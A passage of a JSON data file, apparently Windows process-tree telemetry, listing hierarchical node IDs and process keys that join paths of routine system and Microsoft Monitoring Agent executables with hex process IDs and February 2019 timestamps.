\",\"1002/389/484\",\"1002/389/485\",\"1002/389/486\",\"1002/389/487\",\"1002/490\",\"1002/490/491\",\"1002/490/493\",\"1002/490/493/494\",\"1002/499\",\"1002/500\",\"1002/500/501\",\"1002/512\",\"1002/512/513\",\"1002/519\",\"1002/532\",\"1002/537\",\"1002/538\",\"1002/540\",\"1002/543\",\"1002/543/544\",\"1002/543/545\",\"1002/543/546\",\"1002/543/547\",\"1002/543/548\",\"1002/543/549\",\"1002/543/550\",\"1002/543/551\",\"1002/543/552\",\"1002/543/552/553\",\"1002/543/552/553/554\",\"1002/543/552/553/555\",\"1002/543/552/553/556\",\"1002/543/552/553/557\",\"1002/543/552/553/558\",\"1002/543/552/553/559\",\"1002/543/552/553/560\",\"1002/543/552/553/561\",\"1002/543/552/553/562\",\"1002/543/552/553/563\",\"1002/543/552/553/564\",\"1002/543/552/553/565\",\"1002/543/552/553/566\",\"1002/543/552/553/567\",\"1002/543/552/553/568\",\"1002/543/552/553/569\",\"1002/543/570\",\"1002/543/571\",\"1002/543/572\",\"1002/543/573\",\"1002/543/574\",\"1002/543/577\",\"1002/543/578\",\"1002/543/579\",\"1002/543/580\",\"1002/543/581\",\"1002/543/582\",\"1002/543/583\",\"1002/543/584\",\"1002/543/585\",\"1002/543/586\",\"1002/543/587\",\"1002/543/587/588\",\"1002/543/587/588/589\",\"1002/543/587/588/590\",\"1002/543/587/588/591\",\"1002/543/587/588/592\",\"1002/543/587/588/593\",\"1002/543/587/588/596\",\"1002/543/587/588/597\",\"1002/543/587/588/598\",\"1002/543/587/588/599\",\"1002/543/587/588/602\",\"1002/543/587/588/603\",\"1002/543/587/588/604\",\"1002/543/587/588/605\",\"1002/543/587/588/606\",\"1002/543/587/588/607\",\"1002/543/587/588/608\",\"1002/543/587/588/609\",\"1002/543/587/588/610\",\"1002/543/587/588/611\",\"1002/543/587/588/612\",\"1002/543/587/588/613\",\"1002/543/587/588/614\",\"1002/543/587/588/615\",\"1002/543/587/588/616\",\"1002/543/587/588/617\",\"1002/543/587/588/618\",\"1002/543/587/588/619\",\"1002/543/587/588/622\",\"1002/543/587/588/623\",\"1002/543/587/588/624\",\"1002/543/625\",\"1002/543/626\",\"1002/543/627\",\"1002/543/628\",\"1002/543/629\",\"1002/543/630\",\"1002/635\",\"1002/650\",\"1002/661\",\"1002/663\",\"1002/663/664\",\"1002/669\",\"1002/670\",\"1002/670/671\",\"1002/670/672\",\"1002/670/673\",\"1002/670/674\",\"1002/670/675\",\"1002/670/676\",\"1002/670/677\",\"1002/670/678\",\"1002/670/681\",\"1002/670/681/682\",\"1002/670/681/682/683\",\"1002/670/681/682/684\",\"1002/670/681/682/685\",\"1002/670/681/682/686\",\"1002/670/681/682/687\",\"1002/670/681/682/688\",\"1002/670/681/682/689\",\"1002/670/681/682/690\",\"1002/670/681/682/691\",\"1002/670/681/682/692\",\"1002/670/681/682/693\",\"1002/670/681/682/694\",\"1002/670/681/682/695\",\"1002/670/681/682/696\",\"1002/670/681/682/697\",\"1002/670/681/682/698\",\"1002/670/699\",\"1002/670/700\",\"1002/670/701\",\"1002/670/702\",\"1002/670/703\",\"1002/670/704\",\"1002/670/705\",\"1002/670/706\",\"1002/670/707\",\"1002/670/708\",\"1002/670/709\",\"1002/670/710\",\"1002/670/711\",\"1002/670/712\",\"1002/670/713\",\"1002/670/714\",\"1002/670/714/715\",\"1002/670/714/715/716\",\"1002/670/714/715/717\",\"1002/670/714/715/718\",\"1002/670/714/715/719\",\"1002/670/714/715/720\",\"1002/670/714/715/721\",\"1002/670/714/715/722\",\"1002/670/714/715/723\",\"1002/670/714/715/724\",\"1002/670/714/715/727\",\"1002/670/714/715/728\",\"1002/670/714/715/729\",\"1002/670/714/715/730\",\"1002/670/714/715/731\",\"1002/670/714/715/732\",\"1002/670/714/715/733\",\"1002/670/714/715/734\",\"1002/670/714/715/735\",\"1002/670/714/715/736\",\"1002/670/714/715/737\",\"1002/670/714/715/738\",\"1002/670/714/715/739\",\"1002/670/714/715/740\",\"1002/670/714/715/741\",\"1002/670/714/715/742\",\"1002/670/714/715/743\",\"1002/670/714/715/744\",\"1002/670/714/715/745\",\"1002/670/714/715/746\",\"1002/670/714/715/747\",\"1002/670/748\",\"1002/670/749\",\"1002/670/750\",\"1002/670/751\",\"1002/670/752\",\"1002/670/753\",\"1002/764\",\"1002/779\",\"1002/785\",\"1002/790\",\"1002/801\",\"1002/802\",\"1002/802/803\",\"1002/802/804\",\"1002/802/805\",\"1002/802/806\",\"1002/802/807\",\"1002/802/808\",\"1002/802/809\",\"1002/802/810\",\"1002/802/811\",\"1002/802/811/812\",\"1002/802/811/812/813\",\"1002/802/811/812/814\",\"1002/802/811/812/815\",\"1002/802/811/812/816\",\"1002/802/811/812/817\",\"1002/802/811/812/817/818\",\"1002/802/811/812/819\",\"1002/802/811/812/820\",\"1002/802/811/812/821\",\"1002/802/811/812/822\",\"1002/802/811/812/823\",\"1002/802/811/812/824\",\"1002/802/811/812/825\",\"1002/802/811/812/827\",\"1002/802/811/812/827/829\",\"1002/802/811/812/830\",\"1002/802/811/812/831\",\"1002/802/811/812/832\",\"1002/802/833\",\"1002/802/834\",\"1002/802/835\",\"1002/802/836\",\"1002/802/837\",\"1002/802/838\",\"1002/802/839\",\"1002/802/840\",\"1002/802/841\",\"1002/802/842\",\"1002/802/843\",\"1002/802/844\",\"1002/802/845\",\"1002/802/846\",\"1002/802/847\",\"1002/802/848\",\"1002/802/848/849\",\"1002/802/848/849/850\",\"1002/802/848/849/851\",\"1002/802/848/849/852\",\"1002/802/848/849/855\",\"1002/802/848/849/856\",\"1002/802/848/849/857\",\"1002/802/848/849/858\",\"1002/802/848/849/859\",\"1002/802/848/849/860\",\"1002/802/848/849/861\",\"1002/802/848/849/862\",\"1002/802/848/849/863\",\"1002/802/848/849/864\",\"1002/802/848/849/865\",\"1002/802/848/849/866\",\"1002/802/848/849/867\",\"1002/802/848/849/868\",\"1002/802/848/849/869\",\"1002/802/848/849/870\",\"1002/802/848/849/871\",\"1002/802/848/849/872\",\"1002/802/848/849/873\",\"1002/802/848/849/874\",\"1002/802/848/849/875\",\"1002/802/848/849/876\",\"1002/802/848/849/877\",\"1002/802/848/849/878\",\"1002/802/848/849/879\",\"1002/802/848/849/880\",\"1002/802/848/849/881\",\"1002/802/882\",\"1002/802/883\",\"1002/802/884\",\"1002/802/885\",\"1002/802/886\",\"1002/802/887\",\"1002/888\",\"1002/899\",\"1002/904\",\"1002/904/905\",\"1002/916\",\"1002/92\",\"1002/923\",\"1002/932\",\"1002/933\",\"1002/933/934\",\"1002/933/935\",\"1002/933/936\",\"1002/933/937\",\"1002/933/938\",\"1002/933/939\",\"1002/933/940\",\"1002/933/941\",\"1002/933/946\",\"1002/933/947\",\"1002/933/948\",\"1002/933/949\",\"1002/933/950\",\"1002/933/951\",\"1002/933/952\",\"1002/933/953\",\"1002/933/954\",\"1002/933/955\",\"1002/933/956\",\"1002/933/957\",\"1002/933/958\",\"1002/933/959\",\"1002/933/960\",\"1002/933/961\",\"1002/933/962\",\"1002/933/962/963\",\"1002/933/962/963/964\",\"1002/933/962/963/965\",\"1002/933/962/963/966\",\"1002/933/962/963/967\",\"1002/933/962/963/968\",\"1002/933/962/963/969\",\"1002/933/962/963/970\",\"1002/933/962/963/971\",\"1002/933/962/963/972\",\"1002/933/962/963/973\",\"1002/933/962/963/974\",\"1002/933/962/963/975\",\"1002/933/962/963/976\",\"1002/933/962/963/977\",\"1002/933/962/963/978\",\"1002/933/962/963/979\",\"1002/933/962/963/980\",\"1002/933/962/963/981\",\"1002/933/962/963/982\",\"1002/933/962/963/983\",\"1002/933/962/963/984\",\"1002/933/962/963/985\",\"1002/933/962/963/986\",\"1002/933/962/963/987\",\"1002/933/962/963/988\",\"1002/933/962/963/989\",\"1002/933/962/963/990\",\"1002/933/962/963/991\",\"1002/933/962/963/992\",\"1002/933/962/963/993\",\"1002/933/994\",\"1002/933/995\",\"1002/933/996\",\"1002/933/997\",\"1002/933/998\",\"1002/933/999\",\"1003\",\"1003/101\",\"1003/132\",\"1003/176\",\"1003/190\",\"1003/230\",\"1003/339\",\"1003/346\",\"1003/359\",\"1003/382\",\"1003/4\",\"1003/492\",\"1003/497\",\"1003/514\",\"1003/517\",\"1003/535\",\"1003/539\",\"1003/648\",\"1003/667\",\"1003/72\",\"1003/762\",\"1003/777\",\"1003/780\",\"1003/797\",\"1003/897\",\"1003/914\",\"1003/930\",\"1004\",\"1004/10\",\"1004/10/11\",\"1004/107\",\"1004/107/108\",\"1004/120\",\"1004/120/121\",\"1004/127\",\"1004/127/128\",\"1004/129\",\"1004/129/130\",\"1004/139\",\"1004/139/140\",\"1004/15\",\"1004/15/16\",\"1004/5\",\"1004/5/6\",\"1004/67\",\"1004/67/68\",\"1004/76\",\"1004/76/77\",\"1004/78\",\"1004/78/79\",\"1004/8\",\"1004/8/9\",\"1005\",\"1005/12\",\"1005/12/13\",\"1006\",\"1006/54\",\"1006/55\",\"1006/56\",\"1006/57\",\"1006/58\",\"1006/59\",\"1006/60\",\"1007\",\"1007/103\",\"1007/103/104\",\"1007/103/105\",\"1007/103/105/106\",\"1007/123\",\"1007/123/124\",\"1007/134\",\"1007/134/135\",\"1007/134/136\",\"1007/134/136/137\",\"1007/343\",\"1007/343/344\",\"1007/343/349\",\"1007/343/349/350\",\"1007/364\",\"1007/364/365\",\"1007/364/366\",\"1007/364/366/367\",\"1007/385\",\"1007/385/386\",\"1007/385/387\",\"1007/385/387/388\",\"1007/502\",\"1007/502/503\",\"1007/502/504\",\"1007/502/504/505\",\"1007/520\",\"1007/520/521\",\"1007/520/526\",\"1007/520/526/527\",\"1007/530\",\"1007/530/531\",\"1007/594\",\"1007/594/595\",\"1007/594/620\",\"1007/594/620/621\",\"1007/640\",\"1007/640/641\",\"1007/640/642\",\"1007/640/642/643\",\"1007/655\",\"1007/655/656\",\"1007/655/657\",\"1007/655/657/658\",\"1007/69\",\"1007/69/70\",\"1007/69/74\",\"1007/69/74/75\",\"1007/756\",\"1007/756/757\",\"1007/756/758\",\"1007/756/758/759\",\"1007/771\",\"1007/771/772\",\"1007/771/773\",\"1007/771/773/774\",\"1007/788\",\"1007/788/789\",\"1007/791\",\"1007/791/792\",\"1007/791/793\",\"1007/791/793/794\",\"1007/889\",\"1007/889/890\",\"1007/889/895\",\"1007/889/895/896\",\"1007/910\",\"1007/910/911\",\"1007/910/912\",\"1007/910/912/913\",\"1007/926\",\"1007/926/927\",\"1007/926/928\",\"1007/926/928/929\",\"1008\",\"1008/81\",\"1008/81/82\",\"1008/81/84\",\"1008/81/84/97\",\"1008/81/84/97/99\",\"1008/83\",\"1008/83/86\",\"1008/83/88\",\"1008/85\",\"1008/85/87\",\"1008/93\",\"1008/94\",\"1008/94/95\",\"1008/94/96\",\"1009\",\"1009/208\",\"1009/377\",\"1009/89\",\"1009/89/90\",\"1009/89/90/91\",\"1009/98\"],\"proc_key\":[\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0xda42019-02-09 20:04:38.017000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0xed82019-02-09 23:13:26.497000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x1b742019-02-09 23:13:35.410000\",\"c:\\\\windows\\\\system32\\\\dllhost.exe0x1da82019-02-09 23:26:47.703000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x22c82019-02-09 23:35:53.160000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x15582019-02-10 00:14:15.737000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0xa242019-02-10 00:14:24.700000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x4602019-02-10 00:35:53.187000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\windows\\\\system32\\\\unlodctr.exe0x8f02019-02-10 00:45:28.780000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x9342019-02-10 00:45:28.793000\",\"c:\\\\windows\\\\microsoft.net\\\\framework64\\\\v4.0.30319\\\\csc.exe0x11582019-02-10 00:45:30.153000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x18742019-02-10 00:45:30.293000\",\"c:\\\\windows\\\\microsoft.net\\\\framework64\\\\v4.0.30319\\\\cvtres.exe0x12cc2019-02-10 00:45:30.457000\",\"c:\\\\windows\\\\system32\\\\lodctr.exe0x20b42019-02-10 00:45:30.290000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x16342019-02-10 00:45:30.373000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22c02019-02-10 00:45:30.653000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xef42019-02-10 00:45:30.693000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1af02019-02-10 00:45:30.720000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1e802019-02-10 00:45:30.760000\",\"c:\\\\windows\\\\system32\\\\werfault.exe0xf542019-02-10 00:45:30.803000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x6442019-02-10 00:45:36.180000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xdd02019-02-10 00:45:36.187000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x12902019-02-10 00:45:36.287000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x12f02019-02-10 00:45:36.297000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x22742019-02-10 00:45:38.023000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x84c2019-02-10 00:45:38.033000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x91c2019-02-10 00:46:28.000000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x10582019-02-10 00:46:28.010000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0xf102019-02-10 00:48:32.793000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x13982019-02-10 00:48:32.810000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\mof\\\\mofwriter.exe0x1a002019-02-10 00:57:36.083000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xc1c2019-02-10 00:57:36.103000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\dsc\\\\asmhost.exe0xe102019-02-10 00:57:36.167000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1f3c2019-02-10 00:57:36.213000\",\"c:\\\\windows\\\\system32\\\\secedit.exe0xd442019-02-10 00:59:27.207000\",\"c:\\\\windows\\\\system32\\\\secedit.exe0x12902019-02-10 00:59:29.590000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x12f82019-02-10 01:15:36.257000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x10502019-02-10 01:15:36.273000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3473\\\\webbinaries\\\\microsoft.sirona.oms.security.baselineassessment.exe0xbd82019-02-10 01:30:36.103000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x19f42019-02-10 01:30:36.127000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xf602019-02-10 01:45:36.263000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1af02019-02-10 01:45:36.333000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0x8c42019-02-10 01:48:32.220000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x10042019-02-10 01:48:32.230000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xb102019-02-10 02:15:36.263000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x4d02019-02-10 02:15:36.287000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x17e02019-02-10 02:25:36.270000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x8ac2019-02-10 02:25:36.283000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x15b82019-02-10 02:45:36.250000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xa282019-02-10 02:45:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0xec02019-02-10 02:48:32.223000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1bc02019-02-10 02:48:32.233000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0xdd02019-02-10 03:15:36.260000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1f602019-02-10 03:15:36.273000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x22dc2019-02-10 03:15:36.277000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1b642019-02-10 03:15:36.320000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x8382019-02-10 03:45:36.253000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x15902019-02-10 03:45:36.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0xe2c2019-02-10 03:48:32.237000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x14682019-02-10 03:48:32.253000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x16e02019-02-10 04:05:36.257000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xf3c2019-02-10 04:05:36.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x1c842019-02-10 04:15:36.253000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x195c2019-02-10 04:15:36.280000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x1b642019-02-10 04:45:36.263000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1b382019-02-10 04:45:36.277000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0x6902019-02-10 04:48:32.243000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xd5c2019-02-10 04:48:32.250000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x1c202019-02-10 04:55:36.263000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x9642019-02-10 04:55:36.273000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x12802019-02-10 05:15:36.267000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x23b82019-02-10 05:15:36.283000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x6502019-02-10 05:45:36.270000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x11ec2019-02-10 05:45:36.283000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x15842019-02-10 05:45:36.283000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x8382019-02-10 05:45:36.290000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0x4902019-02-10 05:48:32.250000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x8642019-02-10 05:48:32.260000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xfc02019-02-10 06:15:36.260000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x203c2019-02-10 06:15:36.280000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0xa142019-02-10 06:35:36.250000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x21cc2019-02-10 06:35:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x1ce42019-02-10 06:45:36.267000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1bd02019-02-10 06:45:36.277000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0xcc82019-02-10 06:48:32.257000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x15702019-02-10 06:48:32.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x8f82019-02-10 07:15:36.270000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x19ac2019-02-10 07:15:36.300000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x16142019-02-10 07:25:36.253000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x118c2019-02-10 07:25:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x18502019-02-10 07:45:36.253000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xcc82019-02-10 07:45:36.273000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0x16102019-02-10 07:48:32.257000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xde42019-02-10 07:48:32.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x10802019-02-10 08:15:36.267000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x11782019-02-10 08:15:36.287000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x12482019-02-10 08:15:36.277000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x7702019-02-10 08:15:36.290000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x10442019-02-10 08:45:36.260000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x202c2019-02-10 08:45:36.277000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0xf082019-02-10 08:48:32.283000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x94c2019-02-10 08:48:32.290000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0xa782019-02-10 09:05:36.250000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x11d82019-02-10 09:05:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xd742019-02-10 09:15:36.273000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xd042019-02-10 09:15:36.287000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x23d82019-02-10 09:45:36.263000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x8ac2019-02-10 09:45:36.277000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0x3f82019-02-10 09:48:32.293000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1f382019-02-10 09:48:32.303000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x23b82019-02-10 09:55:36.287000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x15e42019-02-10 09:55:36.297000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x15482019-02-10 10:15:36.273000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x128c2019-02-10 10:15:36.290000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x10a82019-02-10 10:45:36.257000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x9642019-02-10 10:45:36.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x5a82019-02-10 10:45:36.270000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x18982019-02-10 10:45:36.277000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0xf882019-02-10 10:48:32.310000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xe082019-02-10 10:48:32.317000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x18b82019-02-10 11:15:36.250000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x14542019-02-10 11:15:36.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x16e82019-02-10 11:35:36.263000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x11842019-02-10 11:35:36.277000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x1d042019-02-10 11:45:36.270000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xe302019-02-10 11:45:36.287000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0xda82019-02-10 11:48:32.317000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1fa82019-02-10 11:48:32.323000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x1f202019-02-10 12:15:36.263000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xfc42019-02-10 12:15:36.280000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0xe3c2019-02-10 12:25:36.257000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x6042019-02-10 12:25:36.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x1fa42019-02-10 12:45:36.267000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xf942019-02-10 12:45:36.377000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0x220c2019-02-10 12:48:32.333000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x22882019-02-10 12:48:32.347000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x6502019-02-10 13:15:36.250000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xae42019-02-10 13:15:36.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x15702019-02-10 